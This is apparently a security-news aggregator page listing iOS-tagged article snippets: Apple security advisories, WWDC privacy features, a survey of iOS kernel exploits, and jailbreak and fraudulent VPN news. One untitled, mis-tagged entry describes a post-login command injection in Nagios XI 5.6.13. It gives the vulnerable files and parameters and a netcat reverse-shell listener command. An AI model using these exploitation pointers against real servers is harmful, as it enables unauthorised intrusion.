HackDig : Dig high-quality web security articles for hackers

[SYSS-2020-011] Apple iOS - Exposure of Resource to Wrong Sphere (CWE-668)

Advisory ID: SYSS-2020-011
Product: Apple iOS
Manufacturer: Apple Inc.
Affected Version(s): 13.3.1, 13.5.1
Tested Version(s): 13.3.1, 13.5.1
Vulnerability Type: Exposure of Resource to Wrong Sphere (CWE-668)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2020-03-23
Solution Date: -
Public Disclosure: 2020-07-02
CVE Reference: Not yet assigned
Author
Publish At:2020-07-03 13:50 | Read:66 | Comments:0 | Tags: IOS

What’s Coming in macOS Big Sur and iOS 14 – Intego Mac Podcast Episode 141

This week, Apple announced the new features for its coming operating system updates: macOS Big Sur, and iOS 14. They also announced a big change to Mac hardware. Josh and Kirk discuss the changes coming, and take a close look at security and privacy features in these operating systems. Apple’s New Plans for the iPhone, iPad, and Mac Unveiled at WWDC 2020 Univ
Publish At:2020-06-26 13:26 | Read:144 | Comments:0 | Tags:Intego Mac Security Podcast IOS

An Apple a Day: Treating BYOD Pains with Apple User Enrollment

Even with workers returning to the office—it might be a trickle or a flood depending on the organization—the shift towards remote work is moving from just a short-term necessity to a long-term reality. That shift has changed the face of business worldwide. This change makes it more important than ever for IT and Security teams to prioritize endpoint manageme
Publish At:2020-06-24 11:06 | Read:115 | Comments:0 | Tags:Application Security Endpoint Mobile Security user enrollmen

macOS 11 and iOS 14 – New security and privacy features

In a socially-distanced keynote address to open Apple’s Worldwide Developer Conference yesterday, the company presented new features for the next versions of all of its operating systems. Apple announced new features for macOS, iOS, iPadOS, watchOS, and tvOS, and security and privacy features were prominent across the various operating systems. In this
Publish At:2020-06-24 09:27 | Read:118 | Comments:0 | Tags:Security & Privacy IOS

A survey of recent iOS kernel exploits

Posted by Brandon Azad, Project Zero
I recently found myself wishing for a single online reference providing a brief summary of the high-level exploit flow of every public iOS kernel exploit in recent years; since no such document existed, I decided to create it here. This post summarizes original iOS kernel exploits from local app context targeting iOS 10 thr
Publish At:2020-06-22 11:43 | Read:170 | Comments:0 | Tags: IOS exploit

The Pros and Cons of Apple’s iOS App Store

If you use apps on your iPhone or iPad, other than those included in iOS, you get them from Apple’s App Store. Since Apple’s App Store is the only way to install apps on iOS devices (unlike with macOS where you can obtain apps from the Mac App Store or from developers) you have to use Apple to provide these apps. The App Store has lots of advanta
Publish At:2020-06-19 13:37 | Read:134 | Comments:0 | Tags:Apple App Store IOS

Managing Battery Life on Macs and iOS Devices

Batteries are essential to our portable devices. For many of us, in our everyday use of Macs and iOS devices, we don’t have to worry too much about this. Modern iPhones and iPads provide a full day’s battery life, and if you use a portable Mac, you can probably get through the day unless you are using battery-intensive apps. But sometimes you can’t. If you’re
Publish At:2020-06-13 14:46 | Read:159 | Comments:0 | Tags:How To Battery iPad iPhone macOS IOS

Fraudulent iOS VPN Apps Attempt to Scam Users

Digital security and privacy company Avast has issued a warning after it discovered three VPN Apps, available on the Apple App Store, which it claimed are fraudulent and appear to be ‘fleeceware’ – apps that are not ‘malicious’ but do not provide the services they claim to and/or are sold at far higher prices than they should be
Publish At:2020-06-04 10:12 | Read:225 | Comments:0 | Tags: IOS

Top Mobile Finance Apps Consistently Failing Security and Data Privacy Tests

iOS and Android apps fail coding best practices, are susceptible to reverse engineering, and share sensitive user data
Executive Summary
Top banks and mobile payment providers are putting their customers at risk for security and privacy by failing to adhere to coding best practices and continuing to share sensitive customer data with advertisers. According
Publish At:2020-06-03 10:09 | Read:203 | Comments:0 | Tags:App Security Android apps banking apps iOS zDefend zScan zSh

APPLE-SA-2020-06-01-1 iOS 13.5.1 and iPadOS 13.5.1

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-06-01-1 iOS 13.5.1 and iPadOS 13.5.1
iOS 13.5.1 and iPadOS 13.5.1 are now available and address the following:
Kernel
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation
Impact: An application may be able to execute arbitrary code with kernel privi
Publish At:2020-06-03 02:22 | Read:452 | Comments:0 | Tags: IOS

Learn How to Use the Secret Features of the iPad and iPhone Control Center

There are a lot of things you can do on your iPhone or iPad, and you can quickly access some important settings, even from the lock screen using Control Center. This interface lets you enable, disable, and adjust a number of settings on your iPhone, and even control things like smart home devices or music playback. But there are a number of secret features i
Publish At:2020-05-30 06:50 | Read:291 | Comments:0 | Tags:How To iOS iPad iPhone

APPLE-SA-2020-05-26-2 iOS 12.4.7

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-05-26-2 iOS 12.4.7
iOS 12.4.7 addresses the following:
Mail
Available for: iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch 6th generation
Impact: Processing a maliciously crafted mail message may lead to unexpected memory modification or application termination
Descri
Publish At:2020-05-29 13:49 | Read:455 | Comments:0 | Tags: IOS

APPLE-SA-2020-05-26-1 iOS 13.5 and iPadOS 13.5

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2020-05-26-1 iOS 13.5 and iPadOS 13.5
iOS 13.5 and iPadOS 13.5 address the following:
Accounts
Available for: iPhone 6s and later, iPad Air 2 and later, iPad mini 4 and later, and iPod touch 7th generation
Impact: A remote attacker may be able to cause a denial of service
Description: A denial of service issue
Publish At:2020-05-29 13:49 | Read:547 | Comments:0 | Tags: IOS


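This one is post-login, so it is of limited use. I found it in April and had been sitting on it; later I saw the official site had been updated, so I am just publishing it. The vendor also has an obvious SQL injection that has not been fixed. It is post-login as well, though; take a look if you are interested. Brief information: Version: 5.6.13 (version 5.6.11 is also affected; you only need to remove the - from the final file name). Condition: logged in. Paths of the vulnerable files: /includes/components/xicore/export-rrd.php, includes/utils-rrdexport.inc.php. Vulnerable parameters: step, start, end. Environment: python3 with the requests library, which can be installed with pip3: python3 -m pip install requests. Running: first listen on a port on the remote machine to receive the reverse connection. Command: nc -l -v -p 4444 python3 nagiox.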
Publish At:2020-05-27 07:25 | Read:277 | Comments:0 | Tags: IOS

New iPhone jailbreak released

by Paul Ducklin
Apple’s latest iOS versions have only been out for a week. The updates are new enough that Apple’s own Security updates page still lists [2020-05-26T14:00Z] the security holes that were fixed in iOS 13.5 and iOS 12.4.7 as “details available soon”. But there’s a jailbreak available already for iOS 13.5, released by th
Publish At:2020-05-26 12:55 | Read:315 | Comments:0 | Tags:Apple iOS DMCA Exploit ios iPhone jailbreak right to repair

